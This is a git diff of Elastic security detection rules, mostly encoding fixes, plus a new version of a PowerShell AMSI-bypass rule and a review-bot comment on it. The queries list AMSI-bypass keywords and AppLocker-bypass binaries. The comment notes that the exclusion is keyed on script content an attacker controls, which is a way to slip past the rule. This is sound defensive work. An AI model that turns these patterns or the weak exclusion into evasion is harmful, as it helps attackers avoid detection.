Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json new file mode 100644 index 00000000000..1451283121e --- /dev/null 
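Review bot: The exclusion added to `query`, `and not powershell.file.script_block_text : ("sentinelbreakpoints" and "Set-PSBreakpoint" and "PowerSploitIndicators")`, is keyed only on tokens inside the script text, which is content the script author controls, yet the `note`'s "False positive analysis" section still says only "This activity is unlikely to happen legitimately" and does not record which benign tooling emits those tokens. Add a line there such as `- Script blocks that contain "sentinelbreakpoints", "Set-PSBreakpoint" and "PowerSploitIndicators" together are excluded because they originate from <TOOL-NAME — to be confirmed>.` so the exception can be re-validated when that tool changes, and consider anchoring the exclusion on a second field (the script's file path, where the event carries one) rather than on script content alone. The same hunk also drops the `"System.Management.Automation.ScriptBlock"` term from the OR list, and nothing in the rule records that narrowing. This rewrites the already-released `_6.json` artifact in place while the new `_7.json` hunk ships the same exclusion without `"PowerSploitIndicators"`; if the two versions are meant to match, one of them is out of sync. The enclosing JSON object starts and ends outside the hunk.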
+++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_7.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of PowerShell script with keywords related to different Antimalware Scan Interface (AMSI) bypasses. An adversary may attempt first to disable AMSI before executing further malicious powershell scripts to evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Antimalware Scan Interface Bypass via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"process\" and host.os.type:windows and\n (\n powershell.file.script_block_text : (\n \"System.Management.Automation.AmsiUtils\" or\n\t\t\tamsiInitFailed or \n\t\t\t\"Invoke-AmsiBypass\" or \n\t\t\t\"Bypass.AMSI\" or \n\t\t\t\"amsi.dll\" or \n\t\t\tAntimalwareProvider or \n\t\t\tamsiSession or \n\t\t\tamsiContext or\n\t\t\tAmsiInitialize or \n\t\t\tunloadobfuscated or \n\t\t\tunloadsilent or \n\t\t\tAmsiX64 or \n\t\t\tAmsiX32 or \n\t\t\tFindAmsiFun\n ) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n )\n", + "references": [ + "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": 
"TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 7 + }, + "id": "1f0a69c0-3392-4adf-b7d5-6012fd292da8_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json b/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json index e7314aca9fe..ae4ca0f1db4 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json +++ b/packages/security_detection_engine/kibana/security_rule/1f460f12-a3cf-4105-9ebb-f788cc63f365_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json index f9fe9a6ab97..20f1e1e8d43 100644 
--- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json
index d0a2d96639e..f03e973e9d9 100644
--- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json
index c873a1733c1..99ac20f257c 100644
--- a/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/1faec04b-d902-4f89-8aff-92cd9043c16f_103.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json
index 8d6c95066ea..75ee74d1735 100644
--- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_104.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. 
If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. 
Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search 
for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id with maxspan=5m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : 
\"msdt.exe\" or\n process.name : \"mshta.exe\" or\n (\n process.name : \"msiexec.exe\" and not\n dns.question.name : (\n \"ocsp.digicert.com\", \"ocsp.verisign.com\", \"ocsp.comodoca.com\", \"ocsp.entrust.net\", \"ocsp.usertrust.com\",\n \"ocsp.godaddy.com\", \"ocsp.camerfirma.com\", \"ocsp.globalsign.com\", \"ocsp.sectigo.com\", \"*.local\"\n )\n ) or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json index 13147c416de..d129ef2865e 100644 --- a/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/1fe3b299-fbb5-4657-a937-1d746f2c711a_105.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", - "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- As trusted developer utilities have dual-use purposes, alerts derived from this rule are not essentially malicious. If these utilities are contacting internal or known trusted domains, review their security and consider creating exceptions if the domain is safe.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Activity from a Windows System Binary\n\nAttackers can abuse certain trusted developer utilities to proxy the execution of malicious payloads. Since these utilities are usually signed, they can bypass the security controls that were put in place to prevent or detect direct execution.\n\nThis rule identifies network connections established by trusted developer utilities, which can indicate abuse to execute payloads or process masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, 
